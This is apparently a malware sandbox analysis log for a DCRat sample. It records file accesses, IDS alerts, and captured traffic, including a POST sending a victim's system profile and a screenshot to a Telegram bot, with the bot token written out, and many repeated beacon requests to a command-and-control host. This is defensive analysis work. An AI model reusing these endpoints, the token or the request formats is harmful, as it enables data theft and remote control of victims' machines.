              Source: C:\Users\user\Desktop\6uPVRnocVS.exe, Code function: 0_2_0010B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0010B8E0
              Source: C:\ProgramData\ssh\System.exe, File opened: C:\Users\user
              Source: C:\ProgramData\ssh\System.exe, File opened: C:\Users\user\Documents\desktop.ini
              Source: C:\ProgramData\ssh\System.exe, File opened: C:\Users\user\AppData
              Source: C:\ProgramData\ssh\System.exe, File opened: C:\Users\user\AppData\Local\Temp
              Source: C:\ProgramData\ssh\System.exe, File opened: C:\Users\user\Desktop\desktop.ini
              Source: C:\ProgramData\ssh\System.exe, File opened: C:\Users\user\AppData\Local
              Source: C:\Recovery\Idle.exe, Code function: 4x nop then dec eax, 30_2_00007FFD9BD71C91

              Networking

              Source: Network traffic, Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:51288 -> 5.101.152.15:80
              Source: Network traffic, Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 5.101.152.15:80 -> 192.168.2.4:53647
              Source: Network traffic, Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 5.101.152.15:80 -> 192.168.2.4:53928
              Source: Network traffic, Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 5.101.152.15:80 -> 192.168.2.4:53943
              Source: Network traffic, Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:53641 -> 149.154.167.220:443
              Source: unknown, DNS query: name: api.telegram.org
              Source: global traffic, TCP traffic: 192.168.2.4:53634 -> 1.1.1.1:53
              Source: global traffic, HTTP traffic detected: GET /json HTTP/1.1, Host: ipinfo.io, Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7170051875:AAE6pL_pl17E85H-TlJS2rKEh_uqVfRc8Gk/sendPhoto?chat_id=5922069347&caption=%E2%9D%95%20Pipavsya%20%E2%9D%95%0A%E2%80%A2%20ID%3A%202068c5dd94a8a9c670748c61bdf89871812759c4%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20035347%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%208.46.123.189%0A%E2%80%A2%20GEO%3A%20US%20%2F%20New%20York%20City%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CIdle.exe HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3253052978f8Host: api.telegram.orgContent-Length: 696321Expect: 100-continueConnection: Keep-Alive
              Source: Joe Sandbox View, IP Address: 149.154.167.220
              Source: Joe Sandbox View, IP Address: 34.117.59.81
              Source: Joe Sandbox View, ASN Name: BEGET-ASRU
              Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknown, DNS query: name: ipinfo.io
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N HTTP/1.1 Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryJp3V6slVJ7hXe8d3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: monrul3t.beget.tech Content-Length: 86203 Expect: 100-continue
bOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=QX9JiI6ICNmNGOkRzYlFjZzQjM1QzY0M2N0QWOzYTO2kTY2AzNkJCLiczNlVGO4EDMwQWOkFDN5Y2M0UTYyYDNzQjYyImY5YjN3kDZzEjY0gjI6ISZ2EGO1kzY5EGZjZ2M1YmM2UWMjZTY5ADNyQWOjJmYjJCLiQzY5UzNyEDOxcDO5gjZkJWM2MGO0cDM3YzY5EGOhRTOkRWNjhjNwIjI6ICNkhzMxUmYzUDM5cDZil